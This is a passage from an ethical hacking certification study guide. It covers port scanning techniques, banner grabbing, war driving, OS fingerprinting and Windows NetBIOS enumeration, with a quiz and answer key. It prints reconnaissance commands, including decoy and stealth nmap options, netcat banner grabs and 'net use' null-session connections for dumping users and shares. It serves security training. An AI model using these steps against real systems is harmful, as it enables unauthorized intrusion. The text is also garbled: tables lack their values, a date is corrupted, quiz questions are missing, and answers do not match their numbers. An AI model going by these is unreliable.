Scanning is a method adopted by administrators and attackers alike to discover more about a
network. Port scanning is the process of connecting to TCP and UDP ports for the purpose of finding
what services and applications are running on the target device. This helps the attacker decide the
best way to attack the system.
The target computer runs many services that listen at well-known ports. Port scanning is one of the
most common reconnaissance techniques used by testers to discover the vulnerabilities in these
services. Port scanning is functionally the process of sending a data packet to a port to gather
information about the state of the port.
A scan may first be implemented using the ping utility. Then, after determining which hosts and
associated ports are active, the attacker can initiate different types of probes on the active ports.
Once youve identified the IP address of a target system through footprinting, you can begin the
process of port scanning: looking for holes in the system through which you, or a malicious intruder,
can gain access. A typical system has 2^16 -1 port numbers (65,535), each with its own TCP and
UDP port that can be used to gain access if unprotected.
TCP and UDP must use port numbers to communicate with the upper layers. Port numbers are used
to keep track of the different conversations simultaneously crossing the network. Originating source
port numbers dynamically assigned by the source host are usually some number greater than 1,023.
Port scanning makes it possible to find what TCP and UDP ports are in use. For example, if ports 25,
80, and 110 are open, the device is running the SMTP, HTTP, and POP3 services.
An attacker can use port-scanning software to determine which hosts are active and which are
inactive (down) in order to avoid wasting time on inactive hosts. A port scan can gather data about a
single host or several hosts within a subnet (256 adjacent network addresses).
Types of information gathered from scanning include:
Details about the targets Domain Name System (DNS)
What network services are available and running, such as email, FTP, or remote logon on the
target hosts
The type and release version of the operating system running on the target hosts
Ports have three states: open, closed, and filtered:
1. An open port is accepting communications from the target device.
2. A closed port is not accepting connectivity.
3. A filtered port has some type of network device, like a firewall, preventing the port from being
probed to discover whether its open or closed.
The NMap utility, which we discuss later, has the ability to determine the state of a port.
UDP
Sequenced
Unsequenced
UDP
Connection-oriented
Connectionless
Reliable
Unreliable
High overhead
Low overhead
Slower
Faster
UDP is almost useless for obtaining scanning information, as opposed to TCP. Since UDP uses best
effort and is focused on speed (which is why its better than TCP for streaming audio and video), the
hacker cant manipulate a response to generate error messages or avoid detection by an IDS like
TCP. The UDP scan might generate an ICMP unreachable message code, but since ICMP is likely
to be blocked, youll most often get no response at all.
Manipulation of TCPs three-way handshake is the basis for most TCP-based scanning. As shown in
Figure 5-3, in its basic form, the TCP three-way handshake is broken into the following steps:
1. SYN sent from client
2. SYN/ACK sent from server
3. ACK sent from client
TCP connect() scanning. Connect() is the most basic and fastest-scanning technique.
Connect() is able to scan ports quickly simply by attempting to connect to each port in
succession. The biggest disadvantage for attackers is that it is the easiest to detect and can be
stopped at the firewall.
TCP SYN (half open) scanning. TCP SYN scanning is often referred to as half-open scanning
because, unlike TCP connect(), a full TCP connection is never opened:
1. The scanning machine sends a SYN packet to a target port.
2. If a SYN/ACK is received, it indicates that the port is listening.
3. The scanner breaks the connection by sending an RST (reset) packet.
4. If an RST is received, it indicates that the port is closed.
This is harder to trace because fewer sites log incomplete TCP connections, but some packetfiltering firewalls look for SYNs to restricted ports.
TCP SYN/ACK scanning. TCP SYN/ACK is another way to determine whether ports are open or
closed. The scanner initially sends a SYN/ACK to the target port. If the port is closed, it assumes
the SYN/ACK packet was a mistake and sends an RST. If the port is open, the SYN/ACK packet
will be ignored and the port will drop the packet. This is considered a stealth scan, since it isnt
likely to be logged by the target, but many intrusion detection systems may catch it.
TCP FIN scanning. TCP FIN is a stealth scan that works like the TCP SYN/ACK scan. The
scanner sends a FIN packet to a port. If the port is closed, it replies with an RST. If the port is
open, it ignores the FIN packet. Beware: A Windows machine will send an RST regardless of the
state of the port, so this scan is useful only for identifying listening ports on non-Windows
machines (or for identifying a Windows OS machine).
TCP FTP proxy (bounce attack) scanning. TCP FTP proxy (bounce attack) scanning is a very
stealthy scanning technique. It takes advantage of a weakness in proxy FTP connections. It
works like this:
1. The scanner connects to an FTP server and requests that the server initiate a data
transfer process to a third system.
2. The scanner uses the PORT FTP command to declare that the data transfer process is
listening on the target box at a certain port number.
3. The scanner then uses the LIST FTP command to try to list the current directory. The
result is sent over the server data transfer process channel. If the transfer is successful,
the target host is listening on the specified port. If the transfer is unsuccessful, a 425
Cant build data connection: Connection refused message is sent.
Note
Some FTP servers disable the proxy feature to prevent TCP FTP proxy scanning.
RPC scan. A remote program call (RPC) scan is used to locate and identify RPC applications.
After open ports are identified with another scan type, the RPC scan sends each open port an
RPC null to provoke a response from any RPC application that might be running. Figure 5-4
shows an NMap RPC scan.
IDLE scan. Considered the only totally stealth scan, an IDLE scan is a way of scanning a remote
device to gather port information using another station on the network. It will appear that the
scanning process is initiated from this third-party IP address instead of the source host.
XMAS Tree scan. The XMAS tree scan sends a TCP frame to a remote device with the URG,
PUSH, and FIN flags set.
All three of these scans and others are available with the NMap scanning tool.
Sometimes a targets operating system details can be found very simply by examining its Telnet
banners or its File Transfer Protocol (FTP) servers, after connecting to these services. We discuss
banner grabbing later.
TCP/IP stack fingerprinting is another technique to identify the particular version of an operating
system. Since OS and device vendors implement TCP/IP differently, these differences can help in
determining the OS. We describe fingerprinting in more detail later.
Another type of OS identification technique is TCP initial sequence number sampling. After a target
responds to a connection request, information about the operating system can be deduced from the
pattern of the sequence numbers in the response.
Scanning Tools
While many of these tools are used by attackers and intruders, they also help the security
administrator detect and stop malicious scans. Used with intrusion detection systems, these tools can
provide some level of protection by identifying vulnerable systems, and they can provide data about
the level of activity directed against a machine or network. Since scanning is a continuous activity
(that is, all networked systems are being scanned all the time), its very important that the security
professional know what can be compromised. Some common scanning tools are as follows:
HPing is a network analysis tool that sends packets with non-traditional IP stack parameters. It
allows the scanner to gather information from the response packets generated.
Legion will scan for and identify shared folders on scanned systems, allowing the scanner to
map drives directly. It is older software.
Nessus is a free security-auditing tool for Linux, BSD, and a few other platforms. It requires a
back-end server that has to run on a Unix-like platform.
NMap is a very common port-scanning package. More information on NMap follows this section.
The CEH candidate should have hands-on familiarity with this tool.
Security Administrators Integrated Network Tool (SAINT) examines network services, such
as finger, NFS, NIS, FTP and tftp, rexd, statd, and others, to report on potential security flaws.
System Administrator Tool for Analyzing Networks (SATAN) is one of the oldest network
security analyzers. SATAN scans network systems for well-known and often exploited
vulnerabilities.
Tcpview will allow identification of what application opened which port on Windows platforms.
Snort is a utility used for network sniffing. Network sniffing is the process of gathering traffic from
a network by capturing the data as it passes and storing it to analyze later.
SuperScan is a TCP/UDP port scanner, pinger, and hostname resolver. It can perform ping
scans and port scans using a range of IP addresses, or it can scan a single host. It also has the
capability to resolve or reverse-lookup IP addresses.
THC-Amap is a scanning and banner grabbing utility that probes ports to find out what is really
running. It helps to find services that might have been redirected from their standard ports.
Scanrand is a very fast scanning tool. It scans multiple TCP ports at once by implementing
stateless parallel scanning.
Other scanning and cracking tools include Network Security analysis Tool (NSAT), VeteScan, Security
Auditors Research Assistant (SARA), PortScanner, Network Superscanner, CGI Port Scanner, and
CGI Sonar.
The most popular port scanner for Linux, NMap (www.insecure.org/NMap), is also available for the
Windows platform. Considered a required tool for all ethical hackers, NMap can scan a system in a
variety of stealth modes, depending on how undetectable you want to be. NMap can also determine a
lot of information about a target, like what hosts are available, what services are offered, and what OS
is running.
NMap scans for most ports from 11024 and a number of others in the registered and undefined
ranges. This helps identify software like PCAnywhere, SubSeven, and BackOrifice. Now that a
Windows interface has been written, it no longer has to be run only on a Unix system.
NMap allows scanning of both TCP and UDP ports, with root privilege required for UDP. While NMap
doesnt have signature or password-cracking capabilities, like L0pht Crack, it will estimate how hard it
will be to hijack an open session.
NMaps Window Scan setting is a very valuable tool for finding open ports and related services, as
shown in Figure 5-5.
NMap is also functional as a command-line utility. To see the list of NMap options, just type NMap from
the command line:
C:\NMap
Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing
policy
Vulnerable Ports
There are a total of 65,535 TCP and 65,535 UDP port numbers that the system uses to identify
specific processes communicating with other processes.
Because the complete listing of well-known and registered ports is extensive, some ports are attacked
more often than others. In fact, most attackers will focus on the first 1,024 ports, called the well-known
ports, because most standard services and applications run in this area.
Note
Well-known portsA good list of well-known ports can be found at
www.iana.org/assignments/port-numbers.
In Table 5-2, weve listed the ports most commonly used and likely to be scanned.
Table 5-2: Commonly Attacked Ports
Open table as spreadsheet
PORT #
SERVICE NAME
SERVICE DESCRIPTION
21
ftp
23
telnet
25,109,110, 143
53
dns
http
118
sqlserv
119
nntp
161
snmp
194
irc
389,636
ldap
2049
nfs
5631
PCAnywhere
False positives. Some legitimate software uses port numbers registered to other software, which
can cause false alarms when port scanning. This can lead to blocking legitimate programs that
appear to be intrusions.
Heavy traffic. Port scanning can have an adverse effect on WAN links and even effectively
disable slow links. Because heavy port scanning generates a lot of traffic, it is usually preferable
to perform the scanning outside normal business hours.
False negatives. Port scanning can sometimes exhaust resources on the scanning machine,
creating false negatives and not properly identifying vulnerabilities.
System crash. Port scanning has been known to render needed services inoperable or actually
to crash systems. This may happen when systems have not been currently patched or the
scanning process exhausts the targeted systems resources.
Unregistered port numbers. Many port numbers in use are not registered, which complicates
the act of identifying what software is using them.
Banner Grabbing
One of the easiest ways to discover what services are running on the open ports is by banner
grabbing. Banner grabbing also provides important information about what type and version of
software is running. Although most port scanners can perform banner grabbing, banner grabbing can
be performed with just native Telnet or FTP.
If the web server is not properly patched, Telnet can be used to grab HTTP, FTP, and SMTP server
information, using the command syntax: Telnet (IP Address) (Port #).
For example, executing a Telnet banner grab against a Microsoft-IIS/5.0 server creates the following
result:
C:\>telnet 192.168.0.100 80
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Mon, 05 Feb Oct 2007 16:04:52 GMT
Content-Type: text/html
Another way to grab banners is to use the free utility Netcat (http://netcat.sourceforge.net/).Distributed
freely under the GNU General Public License (GPL), Netcat has many uses, including banner
grabbing. To grab a banner, execute Netcat from the command line with the syntax:
nc -v -n IP-Address Port
Some of Netcats features include:
Creating outbound and inbound connections, TCP or UDP, to or from any ports
Providing a tunneling mode which allows special tunneling such as UDP to TCP, with the
possibility of specifying all network parameters (source port/interface, listening port/interface, and
the remote host allowed to connect to the tunnel)
Providing randomized port-scanning
Parsing RFC 854 telnet codes
Microsofts UrlScan security tool is designed to help restrict the types of HTTP requests that Internet
Information Services (IIS) will process. By blocking specific HTTP requests, the UrlScan security tool
helps prevent potentially harmful requests from reaching the server.
Although UrlScan 2.5 is available on web servers running IIS 4.0 or later, its not included with IIS 6.0,
because Microsoft feels IIS 6.0 has built-in features that provide security functionality equal to or
better than most of the features of UrlScan 2.5.
Organizations running IIS 6.0 sometimes choose to install UrlScan because they feel that it provides
an added level of security, and some organizations have integrated UrlScan features into their server
management practices for IIS and for other Microsoft servers.
Also, UrlScan has several features that help lessen IISs vulnerability to banner grabbing
reconnaissance and to other hacking vulnerabilities. These features include:
DenyExtensions. Limits the attack surface of the server by preventing, based on file name
extensions, specific requests from running ISAPI or CGI code on the server
RemoveServerHeader. Removes or alters the identity of the server from the Server response
header
DenyVerbs. Limits the attack surface of the server by preventing requests that would invoke
WebDAV
DenyHeaders. Limits the attack surface of the server by preventing requests that would invoke
WebDAV
RequestLimits. Enforces limits on the size, in bytes, of separate parts of requests reaching the
server
DenyUrlSequences. Allows UrlScan to detect sequences that are used in URL-based attacks on
a web server
What is WebDAV?
WebDAV stands for Web-based Distributed Authoring and Versioning. It is a set of extensions to the
HTTP protocol that allows users to edit and manage files collaboratively on remote web servers.
War Dialing
Since modems have very weak authentication and often proliferate unchecked throughout an
organization, they can present a readily available back door into the network for an attacker and aid to
discovering running services.
War dialing is the term given to accessing a network by using a modem and software to scan for
target systems with attached modems. Information about these modems can then be used to attempt
external unauthorized access. War dialers automatically test every phone line in an exchange to try to
locate modems that are attached to the network.
A war dialer is a tool used to scan a large pool of telephone numbers to try to detect vulnerable
modems for providing access to a system. The program may search for dial tones by randomly dialing
numbers within a specific bank of numbers or by looking for a modem or fax connection.
The most common war dialer tools are:
THC-Scan. DOS application that dials ranges of numbers to search for a modem or fax
ToneLoc. A program that dials from a file of area codes and number banks
PhoneSweep. A heavy-duty war dialing application that supports simultaneous multiple phone
lines
War walking refers to the same process, but using shoe leather instead of transport, commonly in
public areas such as malls, hotels, or city streets.
The concept of war driving is simple: Using a device capable of receiving an 802.11b signal, a device
capable of locating itself on a map, and software that will log data the moment a network is detected,
the hacker moves from place to place, letting these devices do their jobs. Over time, the hacker builds
up a database comprising the network name, signal strength, location, and IP/namespace in use.
Via SNMP, the hacker may even log packet samples and probe the access point for available data.
The hacker may also mark the location of the vulnerable wireless network with chalk on the sidewalk
or building itself. This is called war chalking and alerts other intruders that an exposed WLAN is
nearby.
Common war driving exploits find many wireless networks with WEP disabled and with only the SSID
for access control. As noted earlier, the SSID for wireless networks can be found quickly. This
vulnerability makes these networks susceptible to whats called the parking lot attack, where, at a safe
distance from the buildings perimeter, an attacker gains access to the target network.
Since wireless access points may proliferate as much as modems, the unsecured wireless access
points can be a danger to organizations because they offer the attacker a route into the network
around the companys firewall.
Wireless Scanners
A bunch of wireless scanning tools have been popping up recently, and many of them are free. Some
of these are:
NetStumbler. NetStumbler displays wireless access points, SSIDs, channels, whether WEP
encryption is enabled, and signal strength. NetStumbler can connect with GPS technology to log
accurately the precise location of access points.
AirSnort. AirSnort is a wireless LAN (WLAN) tool that cracks WEP encryption keys. AirSnort
passively monitors wireless transmissions and automatically computes the encryption key when
enough packets have been gathered.
Kismet. Kismet is an 802.11 wireless network detector, sniffer, and intrusion detection system.
Kismet identifies networks by passively collecting packets and detecting standard named
networks, detects (and given time, decloaks) hidden networks, and infers the presence of
nonbeaconing networks via data traffic.
SSID Sniff. A tool to use when looking to discover access points and save captured traffic, Sniff
comes with a configured script and supports Cisco Aironet and random prism2 based cards.
WifiScanner. WifiScanner analyzes traffic and detects 802.11b stations and access points. It can
listen alternatively on all 14 channels, write packet information in real time, and search access
points and associated client stations. All network traffic may be saved in the libpcap format for
post analysis.
AirMagnet. AirMagnet is a wireless tool originally created for WLAN inventory, but it has
developed into a useful wireless security assessment utility.
AiroPeek. WildPackets AiroPeek is a packet analyzer for IEEE 802.11b wireless LANs,
supporting all higher-level network protocols such as TCP/IP, AppleTalk, NetBEUI, and IPX.
AiroPeek is used to isolate security problems by decoding 802.11b WLAN protocols and by
analyzing wireless network performance with an identification of signal strength, channel, and
data rates.
Sniffer Wireless. McAfee Sniffer Wireless is a packet analyzer for managing network
applications and deployments on Wireless LAN 802.11a and 802.11b networks. It has the ability
to decrypt Wired Equivalent Privacybased traffic (WEP).
Fingerprinting
At this point, the attacker has gathered a lot of information but needs to know more about the
operating system of the target. Fingerprinting is a process to determine the operating system on the
target computer. One advantage of fingerprinting over some of the more robust scanning techniques
is that its less detectable. Anytime the reconnaissance is less noticeable, the greater the chances are
that it will succeed.
Fingerprinting exploits the fact that various operating system vendors implement the TCP stack
differently. Uniquely built packets are sent to the target host, and the response is logged. This
response is then is compared with a database to aid in determining the targets operating system.
There are two ways an attacker can implement fingerprinting: active and passive.
Passive Fingerprinting
Passive fingerprinting is less accurate than active fingerprinting but is less detectable by intrusion
detection systems. Like active fingerprinting, passive fingerprinting is also based on the different way
the TCP stack is implemented by different operating systems and comparing those differences.
Instead of relying on scanning the target host, passive fingerprinting captures packets from the target
host (sniffing) and examines them for specific operating system identifiers.
TTL is useful not only for determining that a machine is live but also for determining the operating
system running on that machine. Table 5-3 shows some common Time To Live values. Remember
that the TTL will decrement each time the packet passes through a router. This means that the TTL of
a router 6 hops away (as determined by traceroute) will be 249 (255 6).
Table 5-3: Time To Live (TTL) Values
Open table as spreadsheet
TIME TO LIVE
255
128
60
32
Looking at the TTL is not a 100 percent accurate method of determining the OS and works better for
some operating systems than for others. Other TCP signatures provide clues to the type of OS
running on a target machine.
Many different identifiers can be used to fingerprint the OS, but the four TCP stack elements that are
most commonly examined are:
TTL. Various operating systems set the Time To Live value differently.
Initial TCP Window Size. Different operating systems use different values for the initial window
size.
Dont Fragment (DF) bit. Not all operating systems handle fragmentation in the same way.
Type of Service (TOS). A three-bit field that controls the priority of specific packets
Active Fingerprinting
Active fingerprinting is more accurate than passive, but its not as stealthy. Its similar to passive
fingerprinting, in that active fingerprinting also looks for variations in the implementation of the TCP/IP
stack. Since it involves actually sending altered packets, rather than just passively sniffing packets, it
is more powerful, accurate, and detectable.
An excellent passive fingerprinting tool is P0f. It can be found at http://lcamtuf.coredump.cx/p0f.shtml.
Some of the scanning methods employed in active fingerprinting (such as the FIN probe, TCP initial
window size, TOS, fragmented packet handling, and initial sequence number sampling) have been
mentioned earlier in the passive fingerprinting and the port scanning sections. Other methods include
examining the ACK value, sampling the IPID value, or sending a bogus flag probe.
Several tools exist that support active fingerprinting, including the ubiquitous NMap, Xprobe
(http://xprobe.sourceforge.net/), and Winfingerprint (http://winfingerprint.com/index.php).
Network info. Public domain name information; DNS servers; IP addressing scheme and IPs in
use; types of operating systems in use; running machines and services; open ports; WLAN
access points; and modem and fax lines open.
Company info. Company and branch locations; public phone numbers and email addresses;
merger and acquisition information; public financial records; and some individual employee
information.
Assessment Questions
Answers to these questions can be found in Appendix A.
1.
2.
4.
Which choice is not a common technique used to identify open ports and services?
a. Banner grabbing
b. War dialing
c. UrlScan
d. Port scanning
5.
6.
Which choice is not a reason to want to know what services are running or listening on the
target?
a. To identify potential ports for creating attack vectors
b. To lessen the chances of being detected
c. To get operating system information
d. To identify specific applications
7.
What response do you get from ping if the target isnt live?
a. Ping returns an ICMP Echo Reply message.
b. Ping returns a TCP Echo Request packet.
c. Ping returns an ICMP Echo Request packet.
d. Ping returns a Request timed out message.
8.
How many total TCP and UDP port numbers are there?
a. 1024
b. 8984
c. 16,664
d. 65,535
9.
Besides TTL, which choice is not a TCP signature that helps identify the targets OS?
a. Dont Fragment (DF) bit
b. WebDAV
c. Type of Service (TOS)
d. Initial Window Size
c. NLog
d. NetCat
13. Which choice is not a common war dialer tool?
a. ToneLoc
b. Telnet
c. THC-Scan
d. PhoneSweep
14. Which choice is the best description of war driving?
a. A traveling hacker sniffing for WLANs
b. Scanning a pool of telephone numbers to detect vulnerable modems
c. Blocking specific HTTP requests to IIS
d. Banner grabbing with Telnet
15. Which choice is not part of the scanning phase?
a. Port scanning individual systems
b. Fingerprinting the operating system
c. Reviewing the targets annual report
d. Uncovering services on ports
16. Which choice is not a common wireless scanning tool?
a. NetStumbler
b. Kismet
c. AirSnort
d. NetCat
17. Which choice is the best description of the goal of fingerprinting?
a. To determine the targets operating system
b. To compile a list of company branches
c. To scan telephone numbers to detect modems
d. To prevent false positives
18. Which is the best choice to describe the difference between active and passive
fingerprinting?
a. Active fingerprinting is less accurate.
b. Active fingerprinting is less detectable.
c. Passive fingerprinting is more detectable.
d. Passive fingerprinting is less detectable.
19. Which is not one of the three states of a port?
a. Open
b. Filtered
c. Half-open
d. Closed
20. Which choice is not a reason to try to detect active machines on the target network?
a. To identify the perimeter of the targets network
b. To compile a list of employee phone numbers
c. To create an inventory of which networked systems are accessible on the target
d. To fill in accurate details in the network map youre creating
Answers
1.
Answer: c
The TTL (Time To Live) value is useful not only for determining that a machine is live, and how
many router hops away from the source, but also for determining the targets operating system
type.
2.
Answer: d
Although the tester is still in info gathering mode, scanning is more active than footprinting, and
here the tester begins to get a more detailed picture of the target, by:
Detecting 'live machines on the target network
Discovering services running on targeted servers
Identifying which TCP and UDP services running
Identifying the operating system
Using active and passive fingerprinting
3.
Answer: d
4.
Answer: c
5.
Answer: a
Ping sends out an ICMP Echo Request packet and awaits an ICMP Echo Reply message from an
active machine.
6.
Answer: b
The reasons we want to know what services are running or listening on the target are several:
To determine live hosts in the event ICMP is blocked
To identify potential ports for creating attack vectors
To get operating system information
To identify specific applications
7.
Answer: d
If the target isnt up and running, ping returns a Request timed out message.
8.
Answer: d
A computer has available a total of 65,535 TCP and 65,535 UDP port numbers used to identify a
specific process that is communicating to other processes.
9.
Answer: b
TCP signatures used to determine the targets OS are:
Initial Window Size What the operating system sets the Window Size at.
Dont Fragment (DF) bit Does the operating system set the Dont Fragment bit?
Type of Service (TOS) Does the operating system set the Type of Service, and if so, at
what?
WebDAV stands for Web-based Distributed Authoring and Versioning, and is an HTML
extension.
10. Answer: a
The first 1,024 ports are called the well-known ports, because most standard services and
applications run in this area.
11. Answer: d
Some common issues a scanner needs to be aware of are false positives, heavy traffic and false
negatives resulting from the scan.
12. Answer: c
Chapter 6: Enumerating
Overview
The enumerating phase is the final preattack phase, in which the hacker looks for user account
information, system groups and roles, passwords, and unprotected shares. To understand properly
the enumeration process, we need to look at various elements of Windows architecture and security.
The topics we cover in this chapter are:
Protection rings
Windows architecture
Windows security architecture
Windows enumeration techniques
SNMP enumeration
DNS zone transfer
Active Directory enumeration
Enumeration countermeasures
Protection Rings
In a computational system, multiple processes might be running concurrently. Each process has the
capability to access certain memory locations and to execute a subset of the computers instruction
set. The execution and memory space assigned to each process is called a protection domain.
This domain can be extended to virtual memory, which increases the apparent size of real memory by
using disk storage. The purpose of establishing a protection domain is to protect programs from all
unauthorized modification or executional interference.
One scheme that supports multiple protection domains is the use of protection rings. These rings are
organized with the most privileged domain located in the center of the ring and the least-privileged
domain in the outermost ring. This approach is shown in Figure 6-1.
Windows Architecture
Before we examine Windows emulation techniques, you need to have a basic understanding of
Windows architecture.
Windows Vista, Windows Server 2003, Windows XP, Windows 2000, and Windows NT are all part of
the Windows NT family of Microsoft operating systems. Each of these operating systems shares a
similar kernel, which is important for a hacker, as the kernel is the most trusted part of the operating
system.
Windows NT architecture consists of two main layers, a user mode and a kernel mode, and several
layers of modules within these two main layers. Windows implements a distinct protection ring for
each of these two layers. The user mode operates in ring 3, and kernel mode operates in ring 0.
Programs and subsystems in user mode have access to a limited number of system resources, while
kernel mode has unrestricted access to all resources including system memory and external devices.
This distinction of user mode versus kernel mode is important, as attack tools operating in user mode
can more easily be detected by antiattack programs. If attack programs can be made to run in kernel
mode on the target, however, the attack can hide from detection and be harder to remove.
User mode is made up of subsystems which can pass I/O requests to the appropriate kernel mode
drivers via the I/O manager (which exists in kernel mode). Applications run at a lower priority than
kernel mode processes.
Kernel mode has full access to the hardware and system resources of the computer and runs code in
a protected memory area. It controls access to scheduling, thread prioritization, memory
management, and interaction with hardware. Kernel mode stops user mode services and applications
from accessing critical areas of the operating system user-mode processes requiring critical resources
to ask the kernel mode to perform operations on their behalf.
Also, the level of account to which a hacker can acquire access will determine the level at which he
can execute code on that system. Since the system account has the capability to run programs in the
kernel mode, obviously an attacker will attempt to acquire that account, to run his code at the highest
privilege level possible.
Figure 6-2 shows a graphical example of the Windows architecture, with the relationship of the user
mode to the kernel mode.
Security Identifiers (SIDs). SIDs identify user, group, and computer accounts. Every account on
a network is issued a unique SID when the account is first created. Internal processes in
Windows refer to an accounts SID rather than the accounts user or group name.
Relative Identifiers (RIDs). RIDs are a subset of the SID and identify a user or group in relation
to the authority that issued the SID.
The SRM is the authority that enforces the security rules and determines whether an object or
resource can be accessed. It refers to access control lists (ACLs), which are themselves made up of
access control entries (ACEs). The ACEs contain the SID and a list of operations that have
permission (allow, deny, or audit) to access that resource. The ACE gives permission to a select group
of trustees: a user account, group account, or logon session.
Universal, well-known SIDs identify generic groups and generic users. For example, the well-known
SID used to identify the Everyone group that includes all users is S-1-1-0. The S identifies the
string as an SID, the first 1 is the revision level of the SID, and the remaining two digits are the
SECURITY_ WORLD_SID_AUTHORITY and SECURITY_WORLD_RID constants.
Table 6-1 shows some well-known SIDs.
Table 6-1: Well-Known Security Identifiers (SIDs)
Open table as spreadsheet
UNIVERSAL WELLKNOWND SID
STRING
VALUE
IDENTIFIES
Null SID
S-1-0-0
World
S-1-1-0
Local
S-1-2-0
Creator Owner ID
S-1-3-0
Creator Group ID
S-1-3-1
The RID starts at a fixed value and is incremented by one for each account created. SIDs are unique
unless you use cloning. If you clone a workstation, the user accounts on the two workstations will
have the same SIDs. The first user accounts will be identical, the second, and so on. In workgroup
environments, security is based on local account SIDs giving the duplicate accounts (re: SID) identical
access rights.
Since the administrator account is the account with RID=500, it cannot be obscured successfully.
Therefore, an attacker can find out which account is the administrator account, even if it has been
renamed, by the RID=500.
Some universal RID codes and their related accounts are:
SAM Database
The SAM database is a very important part of Windows security. SAM provides a simple form of name
resolution, minimal transactions, replication, and secure storage for the security database.
SAM manages security principal accounts. It uses Active Directory for storage of these accounts on a
domain controller, and it uses the SAM database in the registry on workstations, stand-alone servers,
and member servers. It is stored in a protected area of the registry of HKLM\SAM.
In the Windows NT environment, both domain controllers and workstations store security principal
accounts in the SAM database, which uses the registry as its underlying persistent storage.
Starting with Windows 2000, domain security principal accounts are stored in Active Directory instead
of the registry. Although security accounts are stored in Active Directory, SAM exists on Windows
2000 domain controllers to ensure compatibility with those domains and applications that depend on
it. SAM also is used by Windows 2000based computers that are not domain controllers for local
account storage.
A domain in SAM can refer either to all of the accounts on a single computer or all of the accounts in a
Windows NETBIOS domain.
The Builtin container houses default local group accounts (such as Administrators and Users) that are
installed whenever a new workstation, server, or domain controller is set up. It provides some basic
account types, such as Administrator and Guest, that give the operator sufficient capability to add
further accounts to the computer or domain.
The Builtin container account SIDs are the same on every Windows 2000 or earlier system. These
fixed SIDs allow the predefined groups to be placed in access control lists without regard to the
domain of the system. For this reason, the objects in the Builtin container cannot be changed.
In Windows 2000, domains contain the same objects as in Windows NT 4.0, as well as several
additional properties on certain objects.
On April 30, 2004, the Sasser worm exploited a vulnerability in LSASS to spread via a remote buffer
overflow in computers running Microsoft Windows XP and Windows 2000. The worm is still alive and
is particularly potent in that it can spread without any interaction with humans; nor does it travel by
email like many other worms. It spreads by scanning randomly selected IP addresses for vulnerable
systems.
The WinLogon service starts the LSASS, to which its directed by the Registry value
HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\System. LSASS then
checks for what security DLLs it should load and how to read policy, account, group, and password
information from the SAM and SECURITY Registry hives. Table 6-2 lists the ports commonly
accessed by the Local Security Authority.
Table 6-2: LSA Ports
Open table as spreadsheet
APPLICATION PROTOCOL
PROTOCOL
PORTS
TCP
3269
TCP
3268
LDAP Server
TCP
389
LDAP Server
UDP
389
LDAP SSL
TCP
636
LDAP SSL
UDP
636
IPSec ISAKMP
UDP
500
NAT-T
UDP
4500
RPC
TCP
135
TCP
102465536
NetBIOS
Microsofts Network Basic Input/Output System (NetBIOS) is a standard interface between networks
and PCs that enables applications on different computers to communicate within a LAN. NetBIOS was
created by IBM for its early PC network, was adopted by Microsoft and adapted to run over TCP/IP,
and has since become a de facto industry standard.
NetBIOS is not natively routable across a Wide Area Network (WAN) and is therefore used primarily
on Local Area Networks (LANs). NetBIOS systems identify themselves with a 15-character unique
name and use Server Message Blocks (SMB), which allow remote directory, file, and printer sharing.
This feature makes NetBIOS a hackers playground.
The NetBIOS Name Resolution service listens on UDP port 137; when it receives a query on this port,
it responds with a list of all services it offers. Table 6-3 shows the three primary ports NetBIOS uses.
Table 6-3: NetBIOS Ports
Open table as spreadsheet
APPLICATION PROTOCOL
PROTOCOL
PORTS
UDP
138
UDP
137
PROTOCOL
PORTS
TCP
139
NetBIOS Enumerating
The NetBIOS null session is often referred to as the Holy Grail of Windows hacking. Null sessions
take advantage of flaws in the Common Internet File System/Server Messaging Block (CIFS/SMB).
Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames,
groups, shares, permissions, policies, services, and more using the null user.
The hacker can establish a null session with a Windows host by logging on with a null user name and
password. Using these null connections allows the hacker to gather information from the host such as:
List of users and groups
List of machines
List of shares
User and host Security Identifiers (SIDs)
Net View
Insecure protocols such as System Message Block (SMB) and InterProcess Communication (IPC)
were created back in the day when security was not such a big deal. It should have been, but it
wasnt. As a result, theres a lot of information the attacker can get from using the net command.
Typing net /? will bring up a list of options; lets look at the net view command.
If youve found NetBIOS activity, you can use the net view command to unearth a lot more info.
First, type net view /domain to get a list of domains:
C: \>net view /domain
Domain
Boston
Chicago
New York
The command completed successfully
Now that youve found some groups, drill down further and look at one of them:
C: \>net view /domain:Boston
Server Name
Remark
\\Cranberry
\\Elvis
\\Big Dig
The command completed successfully
Next, try to find unprotected shares on one of the systems:
C: \>net view \\Cranberry
Shared Resources at \\Cranberry
Sharename
Type
CDRW
Disk
Comment
Disk
PDFFact2
Now, create a null connection. The following syntax connects to the hidden Inter-Process
Communication 'share' (IPC$) at IP address 10.1.1.1 with the built-in anonymous user (/u:'''')
with the ('''') null password:
C: \>net use \\<IP addr>\IPC$
or
C: \>net use \\<IP addr>\IPC$
For example, to create a null session on a PC with the IP address 10.1.1.1, type this on the command
line:
C: \>net use \\10.1.1.1\IPC$
NBTSTAT
Windows ships with a standard tool, NBTSTAT, which queries a single IP address when given the -A
parameter. When run on a machine on the local network, it returns:
C:\>NBTSTAT -A 10.1.1.1
NetBIOS Remote Machine Name Table
Name
Type
Status
--------------------------------------------THE-02147C896CB<00>
UNIQUE
Registered
THE-02147C896CB<20>
UNIQUE
Registered
WORKGROUP
GROUP
Registered
<00>
WORKGROUP
<1E>
GROUP
Registered
THE-02147C896CB<03>
UNIQUE
Registered
WORKGROUP
UNIQUE
Registered
..__MSBROWSE__.<01>
GROUP
Registered
ADMINISTRATOR
UNIQUE
Registered
<1D>
<03>
Nbtscan
